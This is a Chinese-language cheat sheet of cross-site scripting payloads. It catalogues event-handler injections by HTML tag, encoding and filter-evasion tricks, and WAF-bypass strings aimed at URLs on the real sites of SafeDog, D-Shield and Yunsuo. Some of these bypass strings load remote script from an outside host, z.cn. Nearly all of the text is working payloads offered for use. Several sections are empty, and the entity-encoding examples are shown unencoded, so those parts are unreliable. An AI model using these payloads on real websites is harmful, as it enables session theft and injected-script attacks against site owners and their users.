xss 常用标签及绕过姿势总结
字数 849 2025-08-12 11:34:03
XSS攻击常用标签及绕过姿势全面指南
一、XSS常见标签语句
1. <a>标签
<a href="javascript:alert(1)">test</a>
<a href="x" onfocus="alert('xss');" autofocus="">xss</a>
<a href="x" onclick=eval("alert('xss');")>xss</a>
<a href="x" onmouseover="alert('xss');">xss</a>
<a href="x" onmouseout="alert('xss');">xss</a>
2. ``标签
3. <iframe>标签
<iframe src="javascript:alert(1)">test</iframe>
<iframe onload="alert(document.cookie)"></iframe>
<iframe onload="alert('xss');"></iframe>
<iframe onload="base64,YWxlcnQoJ3hzcycpOw=="></iframe>
<iframe onmouseover="alert('xss');"></iframe>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
4. <audio>标签
<audio src=1 onerror=alert(1)>
<audio><source src="x" onerror="alert('xss');"></audio>
<audio controls onfocus=eval("alert('xss');") autofocus=""></audio>
<audio controls onmouseover="alert('xss');"><source src="x"></audio>
5. <video>标签
<video src=x onerror=alert(1)>
<video><source onerror="alert('xss');"></video>
<video controls onmouseover="alert('xss');"></video>
<video controls onfocus="alert('xss');" autofocus=""></video>
<video controls onclick="alert('xss');"></video>
6. <svg>标签
<svg onload=javascript:alert(1)>
<svg onload="alert('xss');"></svg>
7. <button>标签
<button onclick=alert(1)>
<button onfocus="alert('xss');" autofocus="">xss</button>
<button onclick="alert('xss');">xss</button>
<button onmouseover="alert('xss');">xss</button>
<button onmouseout="alert('xss');">xss</button>
<button onmouseup="alert('xss');">xss</button>
<button onmousedown="alert('xss');"></button>
8. <div>标签
<div onmouseover='alert(1)'>DIV</div>
<!-- URL编码后 -->
<div onmouseover%3d'alert%26lpar%3b1%26rpar%3b'>DIV<%2fdiv>
9. <object>标签
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4="></object>
10. <script>标签
<script>alert('xss')</script>
<script>alert(/xss/)</script>
<script>alert(123)</script>
11. <p>标签
<p onclick="alert('xss');">xss</p>
<p onmouseover="alert('xss');">xss</p>
<p onmouseout="alert('xss');">xss</p>
<p onmouseup="alert('xss');">xss</p>
12. <input>标签
<input onclick="alert('xss');">
<input onfocus="alert('xss');">
<input onfocus="alert('xss');" autofocus="">
<input onmouseover="alert('xss');">
<input type="text" onkeydown="alert('xss');"></input>
<input type="text" onkeypress="alert('xss');"></input>
<input type="text" onkeydown="alert('xss');"></input>
13. <details>标签
<details ontoggle="alert('xss');"></details>
<details ontoggle="alert('xss');" open=""></details>
14. <select>标签
<select onfocus="alert('xss');" autofocus></select>
<select onmouseover="alert('xss');"></select>
<select onclick=eval("alert('xss');")></select>
15. <form>标签
<form method="x" action="x" onmouseover="alert('xss');"><input type=submit></form>
<form method="x" action="x" onmouseout="alert('xss');"><input type=submit></form>
<form method="x" action="x" onmouseup="alert('xss');"><input type=submit></form>
16. <body>标签
<body onload="alert('xss');"></body>
二、XSS常见绕过技术
1. 编码绕过
浏览器对XSS代码的解析顺序为:HTML解码 → URL解码 → JS解码(只支持UNICODE)
HTML实体编码
<a href="javascript:alert(1)">test</a>
<!-- 十进制 -->
<a href="javascript:alert(1)">test</a>
<!-- 十六进制 -->
<a href="javascript:alert(1)">test</a>
URL编码
<a href="javascript:alert(1)">test</a>
<!-- 单次编码 -->
<a href="javascript:%61%6c%65%72%74%28%31%29">test</a>
<!-- 二次编码 -->
<a href="javascript:%2561%256c%2565%2572%2574%2528%2531%2529">test</a>
JS编码
JS编码策略:
\加上三个八进制数字,如"<"编码为"\074"\x加上两个十六进制数字,如"<"编码为"\x3c"\u加上四个十六进制数字,如"<"编码为"\u003c"
示例:
<input onfocus=location="javascript:\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029" autofocus>
混合编码
<!-- 原代码 -->
<a href="javascript:alert(1)">test</a>
<!-- 对alert进行JS编码(unicode编码) -->
<a href="javascript:\u0061\u006c\u0065\u0072\u0074(1)">test</a>
<!-- 对href标签中的\u0061\u006c\u0065\u0072\u0074进行URL编码 -->
<a href="javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)">test</a>
<!-- 对href标签中的javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)进行HTML编码 -->
<a href="javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)">test</a>
2. Base64编码
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4="></object>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=">test</a>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4="></iframe>
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4="></embed>
使用atob函数解码:
<a href=javascript:eval(atob('YWxlcnQoMSk='))>test</a>
<a href=javascript:eval(window.atob('YWxlcnQoMSk='))>test</a>
<a href=javascript:eval(window['atob']('YWxlcnQoMSk='))>test</a>
<iframe src="javascript:eval(window['atob']('YWxlcnQoMSk='))"></iframe>
3. ASCII编码
<!-- 十进制 -->
<a href='javascript:eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))'>test</a>
<!-- 十六进制 -->
<a href='javascript:eval(String.fromCharCode(0x61, 0x6C, 0x65, 0x72, 0x74, 0x28, 0x31, 0x29))'>test</a>
4. 空格过滤绕过
<html>
- A位置可填充:
/,/123/,%09,%0A,%0C,%0D,%20 - B位置可填充:
%09,%0A,%0C,%0D,%20 - C位置可填充:
%0B,/**/,如果加了双引号,则可以填充%09,%0A,%0C,%0D,%20 - D位置可填充:
%09,%0A,%0C,%0D,%20,//,>
5. 圆括号过滤绕过
<script>alert`1`</script>
<video src onerror="javascript:window.onerror=alert;throw 1">
<svg/onload="window.onerror=eval;throw'=alert\x281\x29';">
6. 单引号过滤绕过
<script>alert(/xss/)</script>
<script>alert(`xss`)</script>
7. alert过滤绕过
<script>prompt(/xss/)</script>
<script>confirm(/xss/)</script>
<script>console.log(3)</script>
<script>document.write(1)</script>
8. 关键词置空绕过
大小写绕过
<ScRiPt>AlErT(/xss/)</sCrIpT>
嵌套绕过
<sc<script>ript>alert(/xss/)</sc</script>ript>
9. 函数拼接
10. 赋值拼接
11. 火狐IE专属
<marquee onstart=alert(1)>
12. 拆分法
<script>a='document.write("'</script>
<script>a=a+'<script src=ht'</script>
<script>a=a+'tp://test.com/xs'</script>
<script>a=a+'s.js></script>")'</script>
<script>eval(a)</script>
三、绕过WAF拦截
1. 安全狗绕过
http://www.safedog.cn/index/privateSolutionIndex.html?tab=2<video/src/onerror=top[`al`%2B`ert`](1);>
http://www.safedog.cn/index/privateSolutionIndex.html?tab=2<video/src/onerror=appendChild(createElement("script")).src="//z.cn">
2. D盾绕过
http://www.d99net.net/News.asp?id=126<video/src/onloadstart=top[`al`%2B`ert`](1);>
http://www.d99net.net/News.asp?id=126<video/src/onloadstart=top[a='al',b='ev',b%2ba](appendChild(createElement(`script`)).src=`//z.cn`);>
3. 云锁+奇安信WAF绕过
http://www.yunsuo.com.cn/ht/dynamic/20190903/259.html?id=1<video/src/onloadstart=top[`al`%2B`ert`](1);>
http://www.yunsuo.com.cn/ht/dynamic/20190903/259.html?id=1<video/src/onloadstart=top[a='al',b='ev',b%2ba](appendChild(createElement(`script`)).src=`//z.cn`);>